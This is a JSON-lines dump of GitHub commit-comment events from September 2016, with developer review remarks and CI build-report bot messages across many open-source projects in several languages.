{"id":"4594272937","type":"CommitCommentEvent","actor":{"login":"laurynas-biveinis"},"repo":{"name":"percona/percona-server"},"payload":{"comment":{"id":19108707,"position":null,"line":null,"path":null,"commit_id":"c6cda8dcf40a050079140c9f07e90a05dbb67c67","created_at":"2016-09-21T06:18:18Z","updated_at":"2016-09-21T06:18:18Z","body":"We expect to make a release somewhere around end of September - first week of October."}},"created_at":"2016-09-21T06:18:18Z"}
{"id":"4594276115","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19108714,"position":1470,"line":1470,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T06:19:22Z","updated_at":"2016-09-21T06:19:22Z","body":"jsonデータのportの値が1でコマンドの\"s1-eth1\"と内容が異なるのは\r\n2種あるから、両方の例を記載したと考えてよいですか？\r\n問題はないと思いますが、\"s1-eth1\"と要求すると1になるのかと一瞬勘違いしてしまいました。"}},"created_at":"2016-09-21T06:19:22Z"}
{"id":"4594279268","type":"CommitCommentEvent","actor":{"login":"aethelwulffe"},"repo":{"name":"LibreEHR/LibreEHR"},"payload":{"comment":{"id":19108722,"position":null,"line":null,"path":null,"commit_id":"736e2f87916b06787115eb4e38a77c651a5f388e","created_at":"2016-09-21T06:20:25Z","updated_at":"2016-09-21T06:20:25Z","body":"Something in this or the other global setting change broke the menus."}},"created_at":"2016-09-21T06:20:25Z"}
{"id":"4594281055","type":"CommitCommentEvent","actor":{"login":"A1ve5"},"repo":{"name":"CSC-IT-Center-for-Science/ansible-role-arc-frontend"},"payload":{"comment":{"id":19108724,"position":4,"line":132,"path":"defaults/main.yml","commit_id":"202a5558eb8088be15eaa83201be1116b5ed6ddc","created_at":"2016-09-21T06:21:01Z","updated_at":"2016-09-21T06:21:01Z","body":"they'll have to be warned and will have to set it as disabled."}},"created_at":"2016-09-21T06:21:01Z"}
{"id":"4594282014","type":"CommitCommentEvent","actor":{"login":"donaldpipowitch"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":19108726,"position":null,"line":null,"path":null,"commit_id":"40a67f632ce17746fa8646a10fa6e06e54eea538","created_at":"2016-09-21T06:21:19Z","updated_at":"2016-09-21T06:21:19Z","body":"I currently try to get this working, but we're blocked by at least one bug I found: https://github.com/bcherny/json-schema-to-typescript/issues/34."}},"created_at":"2016-09-21T06:21:19Z"}
{"id":"4594282297","type":"CommitCommentEvent","actor":{"login":"vrutkovs"},"repo":{"name":"projectatomic/osbs-client"},"payload":{"comment":{"id":19108728,"position":12,"line":443,"path":"osbs/build/build_request.py","commit_id":"004ceb69c27c0f119fae89a93fb6c215a43d9461","created_at":"2016-09-21T06:21:27Z","updated_at":"2016-09-21T06:21:27Z","body":"Agreed, atomic-reactor should be handle those, as architecture might be different on the build node"}},"created_at":"2016-09-21T06:21:27Z"}
{"id":"4594282500","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108729,"position":null,"line":null,"path":null,"commit_id":"ee5f2d18ffd0807abd15b7f27b43f7bd2050c600","created_at":"2016-09-21T06:21:31Z","updated_at":"2016-09-21T06:21:31Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T06:21:31Z"}
{"id":"4594282522","type":"CommitCommentEvent","actor":{"login":"tokmakoff"},"repo":{"name":"AtlasOfLivingAustralia/ala-soils2sat"},"payload":{"comment":{"id":19108730,"position":null,"line":null,"path":null,"commit_id":"134c1e58ab20e9f6d5102a630c570ea40cb59692","created_at":"2016-09-21T06:21:31Z","updated_at":"2016-09-21T06:21:31Z","body":"Hi Chris,\r\n\r\nThis build is breaking and I think it is due to the sdkman script now using .sdkman instead of .gvm.  That means there's a few further lines that need adjusting.  I've pushed a fix to my fork.  \r\nhttps://github.com/tokmakoff/ala-soils2sat\r\nWhat's the best way to get these patches into the main project? \r\n\r\nI've also got a few UI features that our users want to see so it would be great if I could become a contributor to the main project. \r\n\r\nBR,\r\n\r\nAndrew.\r\n\r\n"}},"created_at":"2016-09-21T06:21:31Z"}
{"id":"4594283133","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108733,"position":null,"line":null,"path":null,"commit_id":"ee5f2d18ffd0807abd15b7f27b43f7bd2050c600","created_at":"2016-09-21T06:21:42Z","updated_at":"2016-09-21T06:21:42Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - Win64-Windows-7-VisualStudio-12: OK (2335 of 2339 tests passed, 1 test warnings)\n\n * 5 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 3 tests had: AUD diffs.\n * 4 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 4 tests had: Table big diffs.\n * 2 tests had: ERR diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T06:21:42Z"}
{"id":"4594284579","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-io/initializr"},"payload":{"comment":{"id":19108734,"position":9,"line":9,"path":"initializr-generator/src/main/resources/templates/gitignore.tmpl","commit_id":"d61bf18fa2b7703783ae5315f431afaf5c1d2876","created_at":"2016-09-21T06:22:10Z","updated_at":"2016-09-21T06:22:10Z","body":"I am not keen on bloating the `.gitignore` file like that. Given how many projects are generated a day, I am hesitant to add too much to it. We can revisit if more people are complaining. @shakuzen please create a separate issue for this, thanks."}},"created_at":"2016-09-21T06:22:10Z"}
{"id":"4594292509","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19108752,"position":1470,"line":1470,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T06:24:38Z","updated_at":"2016-09-21T06:24:38Z","body":"内部で保持する値は、実際にスイッチに存在する OFPPort の「番号」としているためです。\r\n番号でないと、フローエントリを入れる際は、番号指定なので、処理が面倒になるため、\r\n入り口で全て番号に変換しております。"}},"created_at":"2016-09-21T06:24:38Z"}
{"id":"4594296261","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/addon-wishlist-sort"},"payload":{"comment":{"id":19108756,"position":5,"line":5,"path":"app/addons/wishlist_sort/func.php","commit_id":"02017502f5ea611d6c1117632bd6944e7496e6f0","created_at":"2016-09-21T06:25:53Z","updated_at":"2016-09-21T06:25:53Z","body":"Эта функция сортирует вообще всю корзину, а не только вишлист. Последний использует `'W'` в качестве типа товаров в корзине:\r\n```\r\nfn_extract_cart_content(Tygh::$app['session']['wishlist'], $user_id, 'W', $user_type);\r\n```\r\n\r\nК тому же, сортировка произойдет только в момент авторизации покупателя: любые добавленные в рамках сессии товары будут выбиты из сортировки на странице просмотра вишлиста до перелогина."}},"created_at":"2016-09-21T06:25:53Z"}
{"id":"4594296431","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/addon-wishlist-sort"},"payload":{"comment":{"id":19108757,"position":18,"line":18,"path":"app/addons/wishlist_sort/func.php","commit_id":"02017502f5ea611d6c1117632bd6944e7496e6f0","created_at":"2016-09-21T06:25:56Z","updated_at":"2016-09-21T06:25:56Z","body":"1. В `fn_extract_cart_content` есть хук `pre_extract_cart`.\r\nУсловие SQL-запроса в нем может быть модифицировано и отличаться от заданного. Это нужно учитывать.\r\n2. Заново выбирать все товары – немного перебор для простой пересортировки контента, который выводится даже без разделения по страницам."}},"created_at":"2016-09-21T06:25:56Z"}
{"id":"4594296537","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19108758,"position":null,"line":null,"path":null,"commit_id":"6489b964ca06d99e0faa139a2f3ab6bff6973417","created_at":"2016-09-21T06:25:58Z","updated_at":"2016-09-21T06:25:58Z","body":"\nBuild report #161539236 for sha 6489b964ca06d99e0faa139a2f3ab6bff6973417:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.08%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2820%20/%209910%20%2828.46%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-24.00%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/master/)\n      "}},"created_at":"2016-09-21T06:25:58Z"}
{"id":"4594298087","type":"CommitCommentEvent","actor":{"login":"khancyr"},"repo":{"name":"ArduPilot/ardupilot"},"payload":{"comment":{"id":19108761,"position":null,"line":null,"path":null,"commit_id":"06cccd6d3b80c85184e07ece0788f324ca7af4d3","created_at":"2016-09-21T06:26:29Z","updated_at":"2016-09-21T06:26:29Z","body":"@tridge should be 100, no? \r\n"}},"created_at":"2016-09-21T06:26:29Z"}
{"id":"4594298950","type":"CommitCommentEvent","actor":{"login":"mschaaf"},"repo":{"name":"Dica-Developer/weplantaforest"},"payload":{"comment":{"id":19108762,"position":65,"line":72,"path":"gradle/deploy.gradle","commit_id":"e6d1c5625c80dc31f0053a8ccd4b31eb64ca480f","created_at":"2016-09-21T06:26:46Z","updated_at":"2016-09-21T06:26:46Z","body":"Yup"}},"created_at":"2016-09-21T06:26:46Z"}
{"id":"4594300399","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19108763,"position":1447,"line":1447,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T06:27:13Z","updated_at":"2016-09-21T06:27:13Z","body":"う〜ん、下記の例文的には、問題なさそうです。\r\nhttp://ejje.weblio.jp/sentence/content/e.g.\r\n`(e.g., energy restrictions, special zones)`\r\n\r\n見づらい、というのであれば、修正します。"}},"created_at":"2016-09-21T06:27:13Z"}
{"id":"4594303125","type":"CommitCommentEvent","actor":{"login":"DinkyDyeAussie"},"repo":{"name":"Wargus/wargus"},"payload":{"comment":{"id":19108764,"position":null,"line":null,"path":null,"commit_id":"ecbd913864cd4c4fd23810c274a68dd76bff4017","created_at":"2016-09-21T06:28:06Z","updated_at":"2016-09-21T06:28:06Z","body":"You're very welcome mate. I've been waiting a long time and had some help from Andrettin with the code to do this. So swing a thankyou his way too!\r\n\r\nJust want to get back as much warcraft 2 functionality as possible."}},"created_at":"2016-09-21T06:28:06Z"}
{"id":"4594304601","type":"CommitCommentEvent","actor":{"login":"dsyer"},"repo":{"name":"spring-io/initializr"},"payload":{"comment":{"id":19108767,"position":9,"line":9,"path":"initializr-generator/src/main/resources/templates/gitignore.tmpl","commit_id":"d61bf18fa2b7703783ae5315f431afaf5c1d2876","created_at":"2016-09-21T06:28:36Z","updated_at":"2016-09-21T06:28:36Z","body":"That doesn't really make sense: \"this is a really popular feature so we're going to restrict it to being only usable by people who us the same IDE\". I guess we can have that debate in a new issue."}},"created_at":"2016-09-21T06:28:36Z"}
{"id":"4594305498","type":"CommitCommentEvent","actor":{"login":"alitokmen"},"repo":{"name":"codehaus-cargo/cargo"},"payload":{"comment":{"id":19108775,"position":null,"line":null,"path":null,"commit_id":"d612bf670252822f3ea52b8b9b226c1218bb624b","created_at":"2016-09-21T06:28:54Z","updated_at":"2016-09-21T06:28:54Z","body":"@garydux, thanks - Your suggestion has been implemented (see: https://github.com/codehaus-cargo/cargo/commit/2c37b11a05ff83b8530e17efe854af6956175589 for the diff)"}},"created_at":"2016-09-21T06:28:54Z"}
{"id":"4594307712","type":"CommitCommentEvent","actor":{"login":"Vankouki"},"repo":{"name":"edu526/fiestas"},"payload":{"comment":{"id":19108780,"position":3,"line":16,"path":"src/propertier/Alertas.java","commit_id":"5114ae91aed1a44e3d0d4724feac2e2e8218d942","created_at":"2016-09-21T06:29:38Z","updated_at":"2016-09-21T06:29:38Z","body":"te falto el punto y coma :v: "}},"created_at":"2016-09-21T06:29:38Z"}
{"id":"4594309975","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19108785,"position":1470,"line":1470,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T06:30:20Z","updated_at":"2016-09-21T06:30:20Z","body":"こんな感じだと誤解も無さそうでしょうか？\r\n```\r\n            port        Port number to connect client.\r\n                        For convenience, port name can be specified\r\n                        and automatically translated to port number.\r\n                        (e.g. \"s1-eth1\" or 1)\r\n```"}},"created_at":"2016-09-21T06:30:20Z"}
{"id":"4594312826","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108792,"position":null,"line":null,"path":null,"commit_id":"a39cb8801b330a8be3e1d050842eb86c5d78d897","created_at":"2016-09-21T06:31:15Z","updated_at":"2016-09-21T06:31:15Z","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-12: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T06:31:15Z"}
{"id":"4594315995","type":"CommitCommentEvent","actor":{"login":"lsps9150414"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19108797,"position":null,"line":null,"path":null,"commit_id":"38979f9c68bd054aca3c6102635b2005914506b1","created_at":"2016-09-21T06:32:16Z","updated_at":"2016-09-21T06:32:16Z","body":"@chirag04 I guess in this case, to do translucent headers we need to set the scenes position to absolute and top: 0 instead."}},"created_at":"2016-09-21T06:32:16Z"}
{"id":"4594316676","type":"CommitCommentEvent","actor":{"login":"LnL7"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19108799,"position":null,"line":null,"path":null,"commit_id":"37f2679e735b8a85954c2dce5eae593338360ac7","created_at":"2016-09-21T06:32:33Z","updated_at":"2016-09-21T06:32:33Z","body":"Looks like this caused a lot of rebuilds for darwin"}},"created_at":"2016-09-21T06:32:33Z"}
{"id":"4594318268","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19108802,"position":1470,"line":1470,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T06:33:03Z","updated_at":"2016-09-21T06:33:03Z","body":"提示して頂きました内容だと誤解なく見れそうです。"}},"created_at":"2016-09-21T06:33:03Z"}
{"id":"4594320765","type":"CommitCommentEvent","actor":{"login":"El-Mango"},"repo":{"name":"CyanogenMod/android_device_samsung_serranoltexx"},"payload":{"comment":{"id":19108805,"position":null,"line":null,"path":null,"commit_id":"66ecc719ace9b37ae94cbcc77a99242cfe855ad0","created_at":"2016-09-21T06:33:50Z","updated_at":"2016-09-21T06:33:50Z","body":"Will LTE still work after this change?"}},"created_at":"2016-09-21T06:33:50Z"}
{"id":"4594325576","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19108815,"position":1364,"line":1364,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T06:35:19Z","updated_at":"2016-09-21T06:35:19Z","body":"`@route()` の重ね書きでできそうですので、こちらで対応します。\r\n```\r\n@route('simpleswitchevpn', '/vtep/networks', methods=['GET'])\r\n@route('simpleswitchevpn', '/vtep/networks/{vni}', methods=['GET'])\r\ndef get_networks(self, req, **kwargs):\r\n```"}},"created_at":"2016-09-21T06:35:19Z"}
{"id":"4594327315","type":"CommitCommentEvent","actor":{"login":"SerenityS"},"repo":{"name":"FlareAOSP/platform_frameworks_opt_telephony"},"payload":{"comment":{"id":19108816,"position":null,"line":null,"path":null,"commit_id":"d815888a037a300f59b3c40f470bbd424ed930c0","created_at":"2016-09-21T06:35:51Z","updated_at":"2016-09-21T06:35:51Z","body":"이거 그대로 가져오면 unset쪽에서 에러나지 않나요?\n나름대로 조작해도 영 안되니;"}},"created_at":"2016-09-21T06:35:51Z"}
{"id":"4594328251","type":"CommitCommentEvent","actor":{"login":"Ramanesh-01"},"repo":{"name":"Ramanesh-01/TestingDesktop"},"payload":{"comment":{"id":19108817,"position":null,"line":null,"path":null,"commit_id":"ac56cf9bae214397d0f11945cb8be8e669a2b6f6","created_at":"2016-09-21T06:36:07Z","updated_at":"2016-09-21T06:36:07Z","body":"___This will also be italic___\r\n"}},"created_at":"2016-09-21T06:36:07Z"}
{"id":"4594330498","type":"CommitCommentEvent","actor":{"login":"Ramanesh-01"},"repo":{"name":"Ramanesh-01/TestingDesktop"},"payload":{"comment":{"id":19108823,"position":null,"line":null,"path":null,"commit_id":"ac56cf9bae214397d0f11945cb8be8e669a2b6f6","created_at":"2016-09-21T06:36:47Z","updated_at":"2016-09-21T06:36:47Z","body":"___test___\r\n"}},"created_at":"2016-09-21T06:36:47Z"}
{"id":"4594330881","type":"CommitCommentEvent","actor":{"login":"Ramanesh-01"},"repo":{"name":"Ramanesh-01/TestingDesktop"},"payload":{"comment":{"id":19108824,"position":null,"line":null,"path":null,"commit_id":"ac56cf9bae214397d0f11945cb8be8e669a2b6f6","created_at":"2016-09-21T06:36:55Z","updated_at":"2016-09-21T06:36:55Z","body":"_test_"}},"created_at":"2016-09-21T06:36:55Z"}
{"id":"4594331088","type":"CommitCommentEvent","actor":{"login":"david942j"},"repo":{"name":"jenkinsci/nodejs-plugin"},"payload":{"comment":{"id":19108825,"position":null,"line":null,"path":null,"commit_id":"f38e0a5d20a747d235dd1c439ebb92eef4b0fe8f","created_at":"2016-09-21T06:36:58Z","updated_at":"2016-09-21T06:36:58Z","body":"facing same issue,\r\nbut after build the latest code still have same issue that `PATH` didn't sect correctly"}},"created_at":"2016-09-21T06:36:58Z"}
{"id":"4594334346","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/addon-wishlist-sort"},"payload":{"comment":{"id":19108832,"position":10,"line":10,"path":"app/addons/wishlist_sort/addon.xml","commit_id":"02017502f5ea611d6c1117632bd6944e7496e6f0","created_at":"2016-09-21T06:38:03Z","updated_at":"2016-09-21T06:38:03Z","body":"Аддон завист от Wishlist, но не указывает его в зависимостях: http://docs.cs-cart.com/4.3.x/developer_guide/addons/scheme/addon_dependencies.html"}},"created_at":"2016-09-21T06:38:03Z"}
{"id":"4594336738","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108837,"position":null,"line":null,"path":null,"commit_id":"303197203d9cb1642089f54b6263dd29eba6a897","created_at":"2016-09-21T06:38:50Z","updated_at":"2016-09-21T06:38:50Z","body":"GetInternalVariableBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-21T06:38:50Z"}
{"id":"4594336824","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19108838,"position":1364,"line":1364,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T06:38:52Z","updated_at":"2016-09-21T06:38:52Z","body":"`@route() `の重ね書きが必要なことをコメントに漏らしてしまいました。\r\n上記で問題ないと思いますので、対応お願い致します。\r\n"}},"created_at":"2016-09-21T06:38:52Z"}
{"id":"4594339375","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108857,"position":null,"line":null,"path":null,"commit_id":"303197203d9cb1642089f54b6263dd29eba6a897","created_at":"2016-09-21T06:39:41Z","updated_at":"2016-09-21T06:39:41Z","body":"GetInternalVariableBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T06:39:41Z"}
{"id":"4594339633","type":"CommitCommentEvent","actor":{"login":"myprasanna"},"repo":{"name":"Rippling/django-rest-framework-mongoengine"},"payload":{"comment":{"id":19108858,"position":null,"line":null,"path":null,"commit_id":"6a2d859819fd9400a395bdd13ad43e648d884427","created_at":"2016-09-21T06:39:46Z","updated_at":"2016-09-21T06:39:46Z","body":"@mohitm86 This was the annoying 'home' must be specified issue."}},"created_at":"2016-09-21T06:39:46Z"}
{"id":"4594339843","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19108859,"position":null,"line":null,"path":null,"commit_id":"0522e8da0438f1be80fb4a50cc05d626c6b8b9bb","created_at":"2016-09-21T06:39:50Z","updated_at":"2016-09-21T06:39:50Z","body":"HI Alucard.\r\nAny AAC HW encoding problem (no sound camera recording) after this commit?"}},"created_at":"2016-09-21T06:39:50Z"}
{"id":"4594341555","type":"CommitCommentEvent","actor":{"login":"drsn0w"},"repo":{"name":"lg-devs/android_device_lge_g5-common"},"payload":{"comment":{"id":19108865,"position":null,"line":null,"path":null,"commit_id":"b458252be6f712f1578adcc147bc75f7d0328576","created_at":"2016-09-21T06:40:20Z","updated_at":"2016-09-21T06:40:20Z","body":"Just curious, why was the camera wrapper removed?"}},"created_at":"2016-09-21T06:40:20Z"}
{"id":"4594342633","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108868,"position":null,"line":null,"path":null,"commit_id":"a39cb8801b330a8be3e1d050842eb86c5d78d897","created_at":"2016-09-21T06:40:43Z","updated_at":"2016-09-21T06:40:43Z","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T06:40:43Z"}
{"id":"4594345843","type":"CommitCommentEvent","actor":{"login":"SobkoAndrey"},"repo":{"name":"SobkoAndrey/Goods-Accounting"},"payload":{"comment":{"id":19108875,"position":null,"line":null,"path":null,"commit_id":"0d43a49709aad0c6453bc80fcaec1e9ca263d46b","created_at":"2016-09-21T06:41:42Z","updated_at":"2016-09-21T06:41:42Z","body":"Start of work"}},"created_at":"2016-09-21T06:41:42Z"}
{"id":"4594347227","type":"CommitCommentEvent","actor":{"login":"wjp"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19108878,"position":18,"line":184,"path":"engines/fullpipe/stateloader.cpp","commit_id":"cf4452388cc4104072801b2a0c74bdef03d419d5","created_at":"2016-09-21T06:42:05Z","updated_at":"2016-09-21T06:42:05Z","body":"SEEK_END should work. But the offset is 'forward' too, so it would be `seek(-4, SEEK_END)` then."}},"created_at":"2016-09-21T06:42:05Z"}
{"id":"4594350950","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":19108885,"position":24,"line":37,"path":"src/org/vitrivr/cineast/core/util/MaxPool.java","commit_id":"bba152c956b84052add71dc1d36eea81ffee5cff","created_at":"2016-09-21T06:43:08Z","updated_at":"2016-09-21T06:43:08Z","body":"You can use a TObjectDoubleHashMap<String> here to avoid java primitive boxing."}},"created_at":"2016-09-21T06:43:08Z"}
{"id":"4594353036","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19108891,"position":null,"line":null,"path":null,"commit_id":"59cac0721d4277b37e3a6817e7fcae8797fbe297","created_at":"2016-09-21T06:43:46Z","updated_at":"2016-09-21T06:43:46Z","body":"pattern 翻新的任务暂停了，先翻译下标题。。。"}},"created_at":"2016-09-21T06:43:46Z"}
{"id":"4594353107","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19108892,"position":18,"line":184,"path":"engines/fullpipe/stateloader.cpp","commit_id":"cf4452388cc4104072801b2a0c74bdef03d419d5","created_at":"2016-09-21T06:43:48Z","updated_at":"2016-09-21T06:43:48Z","body":"Unfortunately it does not. Apparently there is a bug in our Zip code."}},"created_at":"2016-09-21T06:43:48Z"}
{"id":"4594355092","type":"CommitCommentEvent","actor":{"login":"andip71"},"repo":{"name":"OnePlusOSS/android_kernel_oneplus_msm8994"},"payload":{"comment":{"id":19108899,"position":null,"line":null,"path":null,"commit_id":"ada398b71d7e24f3db71bfbe132f1c30383ba1e9","created_at":"2016-09-21T06:44:23Z","updated_at":"2016-09-21T06:44:23Z","body":"This commit seems to be broken. As soon as I apply it (even when compiling a full stock kernel), it breaks USB-OTG for everyone + camera autofocus for many. Confirmed multiple times.\r\n\r\nIs this commit really supposed to be the right one for OOS 3.1.0?\r\n\r\nAndi\r\n"}},"created_at":"2016-09-21T06:44:23Z"}
{"id":"4594360740","type":"CommitCommentEvent","actor":{"login":"magicrub"},"repo":{"name":"ArduPilot/ardupilot"},"payload":{"comment":{"id":19108910,"position":null,"line":null,"path":null,"commit_id":"06cccd6d3b80c85184e07ece0788f324ca7af4d3","created_at":"2016-09-21T06:46:02Z","updated_at":"2016-09-21T06:46:02Z","body":"Capacity is in units of mAh, right?"}},"created_at":"2016-09-21T06:46:02Z"}
{"id":"4594361331","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19108914,"position":18,"line":184,"path":"engines/fullpipe/stateloader.cpp","commit_id":"cf4452388cc4104072801b2a0c74bdef03d419d5","created_at":"2016-09-21T06:46:13Z","updated_at":"2016-09-21T06:46:13Z","body":"Ugh, right. It worked. Thanks for the hint."}},"created_at":"2016-09-21T06:46:13Z"}
{"id":"4594361728","type":"CommitCommentEvent","actor":{"login":"sajidrehan"},"repo":{"name":"sajidrehan/Calculator"},"payload":{"comment":{"id":19108918,"position":null,"line":null,"path":null,"commit_id":"bf0ce74ff8ba2c2de581c22cdf5483fcdabcda16","created_at":"2016-09-21T06:46:21Z","updated_at":"2016-09-21T06:46:21Z","body":"In this version I have added model class \"CalculatorBrain.swift\" and also make things in ViewController.swift private that should be private "}},"created_at":"2016-09-21T06:46:21Z"}
